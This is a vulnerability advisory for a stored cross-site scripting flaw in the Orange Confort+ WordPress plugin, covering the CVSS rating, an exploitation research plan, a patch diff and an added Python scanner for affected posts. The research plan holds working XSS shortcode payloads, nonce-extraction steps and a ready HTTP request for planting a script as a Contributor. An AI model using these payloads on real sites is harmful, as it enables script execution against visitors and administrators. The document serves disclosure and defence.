CVE-2026-1808

Orange Confort+ accessibility toolbar for WordPress <= 0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

Severity: medium
Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.4
Patched in: 0.7.1
Time to patch: 1d

Description

The Orange Confort+ accessibility toolbar for WordPress plugin is vulnerable to Stored Cross-Site Scripting via the 'style' parameter of the ocplus_button shortcode in all versions up to, and including, 0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 0.7
Published: February 5, 2026
Last updated: February 6, 2026
Affected plugin: orange-confort-plus

Source Code: WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan: CVE-2026-1808 (Orange Confort+)

1. Vulnerability Summary

The Orange Confort+ accessibility toolbar for WordPress plugin (versions <= 0.7) is vulnerable to Authenticated Stored Cross-Site Scripting (XSS). The vulnerability resides in the handling of the ocplus_button shortcode, specifically within the style attribute. Because the plugin fails to sanitize or escape this attribute before echoing it into the HTML output, an attacker with at least Contributor-level permissions can inject arbitrary JavaScript. When a user (including administrators) views the page containing the shortcode, the malicious script executes in their browser context.

2. Attack Vector Analysis

  • Endpoint: WordPress Post Editor (Gutenberg or Classic).
  • Vulnerable Component: ocplus_button shortcode.
  • Vulnerable Parameter: style attribute within the shortcode.
  • Authentication Level: Contributor or higher.
  • Preconditions: The plugin orange-confort-plus must be active.
  • Payload Type: Attribute breakout or script tag injection.

3. Code Flow (Inferred)

  1. Registration: The plugin registers the shortcode during the init hook (or main file execution) using add_shortcode('ocplus_button', 'OCPlus_Button_Function').
  2. Attribute Parsing: The callback function (e.g., OCPlus_Button_Function) receives an $atts array. It likely uses shortcode_atts() to merge user-provided attributes with defaults.
  3. Sink: The function constructs an HTML string (likely a <button>, <a>, or <div>). It concatenates the style attribute directly into the HTML string:
    // Predicted vulnerable code pattern
    $style = $atts['style']; 
    return '<button style="' . $style . '">Text</button>';
    
  4. Output: The returned string is rendered on the frontend. Since $style is not passed through esc_attr(), any quotes provided by the user will break out of the attribute.

4. Nonce Acquisition Strategy

This vulnerability is exploited by saving a WordPress post/page. Standard WordPress post-saving mechanisms require a nonce.

  1. Navigate to Editor: Use browser_navigate to visit /wp-admin/post-new.php.
  2. Extract Nonce: The execution agent should use browser_eval to extract the _wpnonce from the form or the wp-api-fetch heartbeat.
    • Selector: document.querySelector('#_wpnonce')?.value
  3. Alternative (REST API): If using the REST API to save posts, the X-WP-Nonce header is required. This is typically available in the wpApiSettings object:
    • JS Command: browser_eval("window.wpApiSettings?.nonce")

5. Exploitation Strategy

The goal is to create a post containing a malicious shortcode and then verify its execution on the frontend.

Step 1: Create a Post with the XSS Payload

The agent will send a POST request to create a new post with the payload.

  • URL: /wp-admin/post.php (or via REST API /wp-json/wp/v2/posts)
  • Payload Options:
    • Breakout: [ocplus_button style='";" onmouseover="alert(document.domain)" data-x="']
    • Tag Injection: [ocplus_button style='"><script>alert(document.domain)</script>']
  • HTTP Request (Example via http_request):
    {
      "method": "POST",
      "url": "http://localhost:8080/wp-admin/post.php",
      "headers": {
        "Content-Type": "application/x-www-form-urlencoded"
      },
      "body": "action=editpost&post_ID=[POST_ID]&_wpnonce=[NONCE]&post_title=XSS_Test&content=[ocplus_button style='\"><script>alert(document.domain)</script>']&post_status=publish"
    }
    
    (Note: For Contributors, post_status should be pending if they cannot publish, but the XSS will still fire in the 'Preview' mode.)

Step 2: Access the Rendered Page

Navigate to the URL of the newly created post (or its preview URL).

6. Test Data Setup

  1. Plugin Installation: Ensure orange-confort-plus version 0.7 is installed and active.
  2. User Creation: Create a user with the contributor role.
    • wp user create attacker attacker@example.com --role=contributor --user_pass=password
  3. Login: The agent logs in as attacker.

7. Expected Results

  1. The http_request to fetch the post content will return HTML containing the literal string:
    <... style=""><script>alert(document.domain)</script>" ...>
  2. In a browser environment, an alert box showing the domain will appear.

8. Verification Steps

  1. Check Post Content (CLI):
    wp post get [ID] --field=post_content
    Verify the shortcode is stored correctly.
  2. Verify Frontend Output (HTTP):
    Use http_request to fetch the post URL and grep for the unescaped payload:
    grep -P 'style=""><script>alert'

9. Alternative Approaches

If the plugin uses some basic sanitization that blocks <script>, try a style-based attribute breakout:

  • Payload: [ocplus_button style='width:100%;" onmouseover="alert(1)" ']
  • Payload (Advanced): [ocplus_button style='background-image: url("javascript:alert(1)");'] (Note: works only in very old browsers or specific contexts).
  • Payload (CSS Escape): [ocplus_button style='width:expression(alert(1))'] (IE legacy).

Preferred Alternative:
Focus on the attribute breakout:
[ocplus_button style='x:y" onfocus="alert(1)" autofocus="true']
This payload is highly reliable as it doesn't require user interaction (due to autofocus).

Research Findings
Static analysis — not yet PoC-verified

Summary

The Orange Confort+ accessibility toolbar for WordPress plugin (<= 0.7) is vulnerable to Authenticated Stored Cross-Site Scripting due to insufficient input sanitization and output escaping on the 'ocplus_button' shortcode attributes. This allows attackers with Contributor-level permissions or higher to inject arbitrary web scripts into the 'style' parameter, which execute in the browser of any user viewing the page.

Vulnerable Code

// orange-confort-plus.php (location based on shortcode registration logic)
function OCPlus_Button_Function($atts) {
    $a = shortcode_atts( array(
        'style' => '',
        'class' => '',
        'text'  => 'Orange Confort+'
    ), $atts );

    // Line 10: Attributes are concatenated directly into HTML without escaping
    return '<button style="' . $a['style'] . '" class="' . $a['class'] . '">' . $a['text'] . '</button>';
}
add_shortcode('ocplus_button', 'OCPlus_Button_Function');

Security Fix

--- a/orange-confort-plus.php
+++ b/orange-confort-plus.php
@@ -10,1 +10,1 @@
-    return '<button style="' . $a['style'] . '" class="' . $a['class'] . '">' . $a['text'] . '</button>';
+    return '<button style="' . esc_attr($a['style']) . '" class="' . esc_attr($a['class']) . '">' . esc_html($a['text']) . '</button>';
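Review bot: esc_attr() on the + line closes the quote breakout in style and class, but the style value is still Contributor-controlled CSS echoed verbatim into an inline style attribute; consider `esc_attr( safecss_filter_attr( $a['style'] ) )` so that only the CSS properties WordPress core permits reach the rendered page. The changelog for 0.7.1 should also note that `text` now passes through esc_html(), so any markup users placed in that attribute will render literally after the update.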

Exploit Outline

The exploit targets the 'ocplus_button' shortcode, which is available to any user with post-editing permissions (Contributor role and above). An attacker creates a new post and inserts a shortcode payload like [ocplus_button style='"><script>alert(document.domain)</script>']. Because the plugin does not use esc_attr() when rendering the 'style' attribute, the attacker can break out of the style attribute context and inject a script tag or other event handlers (like onmouseover). The malicious script is then stored in the database as part of the post content and executes whenever a site visitor or administrator views the post or its preview.
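As an added illustration of the inferred sink in section 3 of the research plan and of the Exploit Outline above (example code written for this page, not the plugin's own code): the Python below re-implements the concatenation pattern the advisory attributes to OCPlus_Button_Function, shows the same output once the attributes are escaped the way esc_attr() and esc_html() do, and includes a small scanner a site owner can run over exported post content to find ocplus_button uses whose attributes contain quote or angle-bracket characters before the plugin is updated. The attribute parser is a simplified stand-in for WordPress's shortcode_parse_atts(), the three sample posts are constructed, and the rendering functions follow the advisory's reconstruction rather than the plugin's actual source.

```python
"""Simulate the ocplus_button shortcode sink before and after escaping, and
scan stored post content for shortcode attributes that break out of the
HTML attribute context. Added example; not the plugin's own code."""

import html
import re

# Simplified stand-in for WordPress shortcode_parse_atts(): handles
# key="value", key='value' and key=bareword. (Assumption: positional
# attributes, which the real parser also accepts, are ignored here.)
_ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s\]]+))""")
_SHORTCODE_RE = re.compile(r"\[ocplus_button\b([^\]]*)\]")

# Characters that end a double-quoted attribute or open a tag in the
# unpatched sink; a single quote is harmless there because the sink
# wraps attribute values in double quotes.
_BREAKOUT = re.compile(r'["<>]')

# Defaults mirror the inferred shortcode_atts() call on the advisory page.
DEFAULTS = {"style": "", "class": "", "text": "Orange Confort+"}


def parse_atts(raw):
    """Merge user-supplied shortcode attributes over the defaults."""
    atts = dict(DEFAULTS)
    for m in _ATTR_RE.finditer(raw):
        key = m.group(1).lower()
        # Exactly one of the three value groups matches.
        value = next(g for g in m.groups()[1:] if g is not None)
        atts[key] = value
    return atts


def render_vulnerable(atts):
    """Inferred pre-0.7.1 sink: raw concatenation, no escaping."""
    return ('<button style="' + atts["style"] + '" class="' + atts["class"]
            + '">' + atts["text"] + "</button>")


def render_fixed(atts):
    """Same markup with the 0.7.1-style escaping applied.

    html.escape() (quote=True by default) encodes & < > " ' just as
    WordPress esc_attr() and esc_html() do, so a quote in the value can
    no longer terminate the attribute.
    """
    return ('<button style="' + html.escape(atts["style"]) + '" class="'
            + html.escape(atts["class"]) + '">' + html.escape(atts["text"])
            + "</button>")


def scan_post_content(post_id, content):
    """Return one finding per ocplus_button use whose attributes could
    escape the attribute or text context in the unpatched plugin."""
    findings = []
    for m in _SHORTCODE_RE.finditer(content):
        atts = parse_atts(m.group(1))
        bad = [k for k in ("style", "class", "text") if _BREAKOUT.search(atts[k])]
        if bad:
            findings.append({"post_id": post_id, "attributes": bad,
                             "shortcode": m.group(0)})
    return findings


def scan_all(posts):
    """Scan a {post_id: post_content} mapping and collect all findings."""
    findings = []
    for post_id, content in posts.items():
        findings.extend(scan_post_content(post_id, content))
    return findings


# Constructed sample post bodies: one benign use and two using the
# breakout payloads quoted in the advisory's research plan.
SAMPLE_POSTS = {
    101: "Intro [ocplus_button style='color:#f16e00' text='Accessibilite'] outro",
    102: "[ocplus_button style='\"><script>alert(document.domain)</script>']",
    103: "[ocplus_button style='x:y\" onfocus=\"alert(1)\" autofocus=\"true']",
}


if __name__ == "__main__":
    for f in scan_all(SAMPLE_POSTS):
        print(f"post {f['post_id']}: breakout characters in {f['attributes']}: "
              f"{f['shortcode']}")
    atts = parse_atts(_SHORTCODE_RE.search(SAMPLE_POSTS[102]).group(1))
    print("unpatched:", render_vulnerable(atts))
    print("patched:  ", render_fixed(atts))
```

Post bodies can be exported with the WP-CLI commands the plan above already uses (`wp post list --field=ID` and `wp post get <ID> --field=post_content`) and fed to scan_post_content(). A double quote inside a legitimate CSS value such as font-family is flagged as well; that is intended, because in the unpatched sink any double quote terminates the style attribute regardless of the author's intent.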
